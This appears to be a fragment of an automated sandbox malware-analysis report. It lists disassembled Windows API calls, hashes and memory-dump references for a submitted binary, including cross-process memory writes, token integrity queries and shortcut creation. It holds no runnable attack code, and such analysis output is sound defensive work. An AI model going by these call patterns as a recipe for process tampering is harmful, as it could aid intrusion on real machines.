                                                                                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00DAC21E
                                                                                                                  Similarity
                                                                                                                  • API ID: MessagePostSleep$RectWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3382505437-0
                                                                                                                  APIs
                                                                                                                  • IsWindowVisible.USER32(?), ref: 00DAE9CD
                                                                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00DAE9EA
                                                                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00DAEA22
                                                                                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00DAEA48
                                                                                                                  • _wcsstr.LIBCMT ref: 00DAEA52
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3902887630-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D8AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D8AF8E
                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00DDDCC0
                                                                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00DDDCE4
                                                                                                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00DDDCFC
                                                                                                                  • GetSystemMetrics.USER32(00000004), ref: 00DDDD24
                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00DC407D,00000000), ref: 00DDDD42
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Long$MetricsSystem
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2294984445-0
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00DACA86
                                                                                                                    • Part of subcall function 00D77E53: _memmove.LIBCMT ref: 00D77EB9
                                                                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00DACAB8
                                                                                                                  • __itow.LIBCMT ref: 00DACAD0
                                                                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00DACAF6
                                                                                                                  • __itow.LIBCMT ref: 00DACB07
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$__itow$_memmove
                                                                                                                  APIs
                                                                                                                  • IsWindow.USER32(00000000), ref: 00DC89CE
                                                                                                                  • GetForegroundWindow.USER32 ref: 00DC89E5
                                                                                                                  • GetDC.USER32(00000000), ref: 00DC8A21
                                                                                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 00DC8A2D
                                                                                                                  • ReleaseDC.USER32(00000000,00000003), ref: 00DC8A68
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ForegroundPixelRelease
                                                                                                                  APIs
                                                                                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00D8B5EB
                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00D8B5FA
                                                                                                                  • BeginPath.GDI32(?), ref: 00D8B611
                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00D8B63B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: ObjectSelect$BeginCreatePath
                                                                                                                  APIs
                                                                                                                  • __calloc_crt.LIBCMT ref: 00D92E81
                                                                                                                  • CreateThread.KERNEL32(?,?,00D92FB7,00000000,?,?), ref: 00D92EC5
                                                                                                                  • GetLastError.KERNEL32 ref: 00D92ECF
                                                                                                                  • _free.LIBCMT ref: 00D92ED8
                                                                                                                  • __dosmaperr.LIBCMT ref: 00D92EE3
                                                                                                                    • Part of subcall function 00D9889E: __getptd_noexit.LIBCMT ref: 00D9889E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                                                  APIs
                                                                                                                  • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00DAB903
                                                                                                                  • GetLastError.KERNEL32(?,00DAB3CB,?,?,?), ref: 00DAB90D
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00DAB3CB,?,?,?), ref: 00DAB91C
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00DAB3CB), ref: 00DAB923
                                                                                                                  • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00DAB93A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                                                                                                  APIs
                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00DB8371
                                                                                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00DB837F
                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00DB8387
                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00DB8391
                                                                                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00DB83CD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                  APIs
                                                                                                                  • CLSIDFromProgID.COMBASE ref: 00DAA874
                                                                                                                  • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00DAA88F
                                                                                                                  • lstrcmpiW.KERNEL32(?,00000000), ref: 00DAA89D
                                                                                                                  • CoTaskMemFree.COMBASE(00000000), ref: 00DAA8AD
                                                                                                                  • CLSIDFromString.COMBASE(?,?), ref: 00DAA8B9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                  APIs
                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00DAB806
                                                                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00DAB810
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DAB81F
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00DAB826
                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00DAB83C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 47921759-0
                                                                                                                  • Opcode ID: 391331e634658bfa11affd2af2cb41dc98eaba51d05d05ffb6884f2c6b375409
                                                                                                                  • Instruction ID: d8e1df0b63d93e8d7b439b71281f19fbb00e5dadf488075a088fe33399812e8b
                                                                                                                  • Opcode Fuzzy Hash: 391331e634658bfa11affd2af2cb41dc98eaba51d05d05ffb6884f2c6b375409
                                                                                                                  • Instruction Fuzzy Hash: 15F04F752003046FEB211FA9EC88E7B3B6EFF4A764F04802AF941C7251CB649842DA70
                                                                                                                  APIs
                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00DAB7A5
                                                                                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00DAB7AF
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00DAB7BE
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00DAB7C5
                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00DAB7DB
                                                                                                                  Similarity
                                                                                                                  • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 47921759-0
                                                                                                                  • Opcode ID: 2d2c625cb801f44e1a3569454b4ff4aa3bcfcf5f4ec41a3e3813f185303e8379
                                                                                                                  • Instruction ID: 996a5aa081ceb7be468b2cff4d78715d49f0be3907ce3488fb3972a310da0169
                                                                                                                  • Opcode Fuzzy Hash: 2d2c625cb801f44e1a3569454b4ff4aa3bcfcf5f4ec41a3e3813f185303e8379
                                                                                                                  • Instruction Fuzzy Hash: CFF04F712403046FEB101FA5AC89E7B3BAEFF86765F14801AFA41C7251DBA09C42DA70
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00DAFA8F
                                                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 00DAFAA6
                                                                                                                  • MessageBeep.USER32(00000000), ref: 00DAFABE
                                                                                                                  • KillTimer.USER32(?,0000040A), ref: 00DAFADA
                                                                                                                  • EndDialog.USER32(?,00000001), ref: 00DAFAF4
                                                                                                                  Similarity
                                                                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3741023627-0
                                                                                                                  • Opcode ID: 222e4bc53b97284a253ec89a614eb69064b8f9adbfd98415648290e9225b1083
                                                                                                                  • Instruction ID: 1c61ebd7d6bcf6bcd56bc4ca23975210c51851adda5448923db0cc62062b369f
                                                                                                                  • Opcode Fuzzy Hash: 222e4bc53b97284a253ec89a614eb69064b8f9adbfd98415648290e9225b1083
                                                                                                                  • Instruction Fuzzy Hash: 9A018130500705ABEB20AB50DD4EBE677BABB01B09F0445A9B58BE56E0DBF0A944CB60
                                                                                                                  APIs
                                                                                                                  • EndPath.GDI32(?), ref: 00D8B526
                                                                                                                  • StrokeAndFillPath.GDI32(?,?,00DEF583,00000000,?), ref: 00D8B542
                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00D8B555
                                                                                                                  • DeleteObject.GDI32 ref: 00D8B568
                                                                                                                  • StrokePath.GDI32(?), ref: 00D8B583
                                                                                                                  Similarity
                                                                                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2625713937-0
                                                                                                                  • Opcode ID: 2af850239f95600b7f83835c1f06b00696a0f01b354859213c658c0a6ab68ce1
                                                                                                                  • Instruction ID: 025928bd1e34dbf366f6d88e05e0d80d9de231afcd17faf25506b1885a07d722
                                                                                                                  • Opcode Fuzzy Hash: 2af850239f95600b7f83835c1f06b00696a0f01b354859213c658c0a6ab68ce1
                                                                                                                  • Instruction Fuzzy Hash: 48F0C930004708AFDB196F26ED0CB657FE6E701322F188299F4A5942F0CB308999DF28
                                                                                                                  APIs
                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00DBFAB2
                                                                                                                  • CoCreateInstance.COMBASE(00DFDA7C,00000000,00000001,00DFD8EC,?), ref: 00DBFACA
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                  • CoUninitialize.COMBASE ref: 00DBFD2D
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                  • String ID: .lnk
                                                                                                                  • API String ID: 2683427295-24824748
                                                                                                                  • Opcode ID: 15851182bc683263d07ee7e911159bd8ea2562537cc6b8f6af1843356b3db37c
                                                                                                                  • Instruction ID: 7ffaa4a34e0f5aa0e1c5a3ab31f2f473db999297f61e88cfe5c722f874fe710f
                                                                                                                  • Opcode Fuzzy Hash: 15851182bc683263d07ee7e911159bd8ea2562537cc6b8f6af1843356b3db37c
                                                                                                                  • Instruction Fuzzy Hash: 18A11971508305AFC300EF64C891EABB7EDEF98714F40895DB55997191EB70EA09CBB2
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: #$+
                                                                                                                  • API String ID: 0-2552117581
                                                                                                                  • Opcode ID: 2cf878088e97fcd3ac985d08be501fac5038148a1190f45fa01bb955977ee8fc
                                                                                                                  • Instruction ID: 2b608d8555013be72ebd79c145831569259d07c90c4592bda96c2476c73674ca
                                                                                                                  • Opcode Fuzzy Hash: 2cf878088e97fcd3ac985d08be501fac5038148a1190f45fa01bb955977ee8fc
                                                                                                                  • Instruction Fuzzy Hash: 6C51DA355042868FDB15FF69C480AEA7BB5EF2A310F284056F991AB2E0D734AC46CB35
                                                                                                                  APIs
                                                                                                                  • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00E0DC40,?,0000000F,0000000C,00000016,00E0DC40,?), ref: 00DB507B
                                                                                                                    • Part of subcall function 00D784A6: __swprintf.LIBCMT ref: 00D784E5
                                                                                                                    • Part of subcall function 00D784A6: __itow.LIBCMT ref: 00D78519
                                                                                                                    • Part of subcall function 00D7B8A7: _memmove.LIBCMT ref: 00D7B8FB
                                                                                                                  • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00DB50FB
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: BuffCharUpper$__itow__swprintf_memmove
                                                                                                                  • String ID: REMOVE$THIS
                                                                                                                  • API String ID: 2528338962-776492005
                                                                                                                  • Opcode ID: 9ad37b013c8d526adb10c2bd26fb08727e39872d658f77a60e4a1e98daf592ca
                                                                                                                  • Instruction ID: 42da766861291d862655edde4d9828ba82ea9b518f0e8154a77363e9039debe0
                                                                                                                  • Opcode Fuzzy Hash: 9ad37b013c8d526adb10c2bd26fb08727e39872d658f77a60e4a1e98daf592ca
                                                                                                                  • Instruction Fuzzy Hash: F7418E34A00609DFCB01EF58D881BAEB7B6FF48344F088069E85AAB256DB70DD41CB71
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DB4D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00DAC9FE,?,?,00000034,00000800,?,00000034), ref: 00DB4D6B
                                                                                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00DACFC9
                                                                                                                    • Part of subcall function 00DB4D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00DACA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 00DB4D36
                                                                                                                    • Part of subcall function 00DB4C65: GetWindowThreadProcessId.USER32(?,?), ref: 00DB4C90
                                                                                                                    • Part of subcall function 00DB4C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00DAC9C2,00000034,?,?,00001004,00000000,00000000), ref: 00DB4CA0
                                                                                                                    • Part of subcall function 00DB4C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00DAC9C2,00000034,?,?,00001004,00000000,00000000), ref: 00DB4CB6
                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00DAD036
                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00DAD083
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                   • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                   • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                   • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                   • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                   • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                   • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                   • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 4150878124-2766056989
                                                                                                                  • Opcode ID: 1da49d9708635a0227a114fab45cea8abbb67c7fbf3f41fc1884fb3e6ec61c67
                                                                                                                  • Instruction ID: df902fba10fcf54dee71ca820d03d2aa5fff91b6d9a410a2f081815a3a13160d
                                                                                                                  • Opcode Fuzzy Hash: 1da49d9708635a0227a114fab45cea8abbb67c7fbf3f41fc1884fb3e6ec61c67
                                                                                                                  • Instruction Fuzzy Hash: 7C412C76900218AFDB10DFA4CC85FEEBB79EF49700F148095EA46BB181DA706E45CB71
                                                                                                                  APIs
                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00E0DBF0,00000000,?,?,?,?), ref: 00DDA4E6
                                                                                                                  • GetWindowLongW.USER32 ref: 00DDA503
                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DDA513
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Long
                                                                                                                  • String ID: SysTreeView32
                                                                                                                  • API String ID: 847901565-1698111956
                                                                                                                  • Opcode ID: 7b8268f88a64d96125498b082581bdd7e757e60c4e7c7b96182555661991602a
                                                                                                                  • Instruction ID: 9fbd448a9ae966d3c60faa1bba2ae1743e59dee47aa4951369b01eb771b69325
                                                                                                                  • Opcode Fuzzy Hash: 7b8268f88a64d96125498b082581bdd7e757e60c4e7c7b96182555661991602a
                                                                                                                  • Instruction Fuzzy Hash: 4B319231100205AFDB119F78DC45BEA7B69EF49324F248726F979A32E1D770E8509B70
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00DDA74F
                                                                                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00DDA75D
                                                                                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00DDA764
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$DestroyWindow
                                                                                                                  • String ID: msctls_updown32
                                                                                                                  • API String ID: 4014797782-2298589950
                                                                                                                  • Opcode ID: 9ac542bc48dd7eef0fce1cf3ab035c5eeceb166577d337c3e9584289ce56a6d2
                                                                                                                  • Instruction ID: f969c566ead912c8f295597ea5c4b02096fc8a7fe10b1b807c559517050baf14
                                                                                                                  • Opcode Fuzzy Hash: 9ac542bc48dd7eef0fce1cf3ab035c5eeceb166577d337c3e9584289ce56a6d2
                                                                                                                  • Instruction Fuzzy Hash: E9213DB5600209AFDB14DF68DCC5EBB7BADEB49394B08445AFA019B351C670EC11CA71
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00DD983D
                                                                                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00DD984D
                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00DD9872
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$MoveWindow
                                                                                                                  • String ID: Listbox
                                                                                                                  • API String ID: 3315199576-2633736733
                                                                                                                  • Opcode ID: 618f36b58d6d388c1934be331a24ea78c4a0b7ae735a58c8e5e9777a3cc5f490
                                                                                                                  • Instruction ID: c3637fcaecbce1e3269dbb17668fd0188b4671c1a32412bc0ab44d2a033a9bc5
                                                                                                                  • Opcode Fuzzy Hash: 618f36b58d6d388c1934be331a24ea78c4a0b7ae735a58c8e5e9777a3cc5f490
                                                                                                                  • Instruction Fuzzy Hash: 1E21F632610218BFEF118F54CC85FBB7BAAEF89B54F018125F904AB290C6729C11DBB0
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00DDA27B
                                                                                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00DDA290
                                                                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00DDA29D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend
                                                                                                                  • String ID: msctls_trackbar32
                                                                                                                  • API String ID: 3850602802-1010561917
                                                                                                                  • Opcode ID: ed967069478be72f6755c349489c8bdd297a49321a3c753ab90b97d191323650
                                                                                                                  • Instruction ID: fe28ab0700f344a6b752df6601c2b79e0c0572479ef19783fa2c0e7034bc04b0
                                                                                                                  • Opcode Fuzzy Hash: ed967069478be72f6755c349489c8bdd297a49321a3c753ab90b97d191323650
                                                                                                                  • Instruction Fuzzy Hash: F011E771240308BEDB245F65CC46FA73B69EF88B54F019119FA55A6190D272E851CB74
                                                                                                                  APIs
                                                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 00D92F79
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00D92F80
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: RoInitialize$combase.dll
                                                                                                                  • API String ID: 2574300362-340411864
                                                                                                                  • Opcode ID: 03b32ce5d047d22f47bfd27c21488e40deffd022e417b2095383de9e663b2ad6
                                                                                                                  • Instruction ID: 53f7fc0c2ab7b30d09195b174224392e52a4ec375fea3b252135b2992fd0705e
                                                                                                                  • Opcode Fuzzy Hash: 03b32ce5d047d22f47bfd27c21488e40deffd022e417b2095383de9e663b2ad6
                                                                                                                  • Instruction Fuzzy Hash: A2E01270695308AFEF206F73EC8DB253A6BAB10B06F048064B202E11A0DBF54058EF28
                                                                                                                  APIs
                                                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00D92F4E), ref: 00D9304E
                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00D93055
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: RoUninitialize$combase.dll
                                                                                                                  • API String ID: 2574300362-2819208100
                                                                                                                  • Opcode ID: 17c53f01c425a871a2a7e08818407835fd5d87baba76becf89ceddd2c591b86c
                                                                                                                  • Instruction ID: d46364889646456c7861f70c69c69da101180cfb55a186b475e72934e09a41d7
                                                                                                                  • Opcode Fuzzy Hash: 17c53f01c425a871a2a7e08818407835fd5d87baba76becf89ceddd2c591b86c
                                                                                                                  • Instruction Fuzzy Hash: CEE0B670646308AFDB305F62ED1DB253A77B710712F144064F20AF21B0CBB54518EB29
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LocalTime__swprintf
                                                                                                                  • String ID: %.3d$WIN_XPe
                                                                                                                  • API String ID: 2070861257-2409531811
                                                                                                                  • Opcode ID: 447cb6cb358f73f563a1d2272f432a3a9f38b4016aaebb489c987f8f85d06951
                                                                                                                  • Instruction ID: f459d00be2b5f002df49784ff0f46627bc2de4409f1761d8b19669c3a80e9d5c
                                                                                                                  • Opcode Fuzzy Hash: 447cb6cb358f73f563a1d2272f432a3a9f38b4016aaebb489c987f8f85d06951
                                                                                                                  • Instruction Fuzzy Hash: CAE0127180815CFACF14E692DD469BB737CAB04310F1084A3B996D2040D375EB54AF31
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00DD20EC,?,00DD22E0), ref: 00DD2104
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00DD2116
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                  • String ID: GetProcessId$kernel32.dll
